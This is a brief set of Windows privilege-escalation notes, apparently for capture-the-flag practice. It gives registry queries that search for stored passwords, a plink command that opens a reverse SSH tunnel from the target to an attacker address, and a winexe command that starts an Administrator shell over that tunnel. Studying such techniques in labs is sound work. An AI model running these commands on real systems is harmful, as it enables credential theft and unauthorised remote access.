Stored Passwords and Port Forwarding

Overview

Credentials can be stored in the registry and some ports are on the machine are only accessible from the inside (itself).

What if the user we landed on is an Administrator but just needs to provide credentials to execute commands as system?

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

netstat -ano

Plink is an SSH and Telnet client which will allow us to port forward on the machine

Upload and Run plink.exe to make it ssh into your machine via the forwarded local port 445, allowing you to access the local port 445.

plink.exe -l root -pw rootpasswd -R 445:127.0.0.1:445 10.10.14.10

You'll be in box inception inside of your attacker machine.

Use winexe to start a shell as Administrator over the port forward connection

winexe -U Administrator%Welcome1 //127.0.0.1 cmd.exe

If there's a credential being leaked in a CTF environment chances are it leads to something else so don't disregard it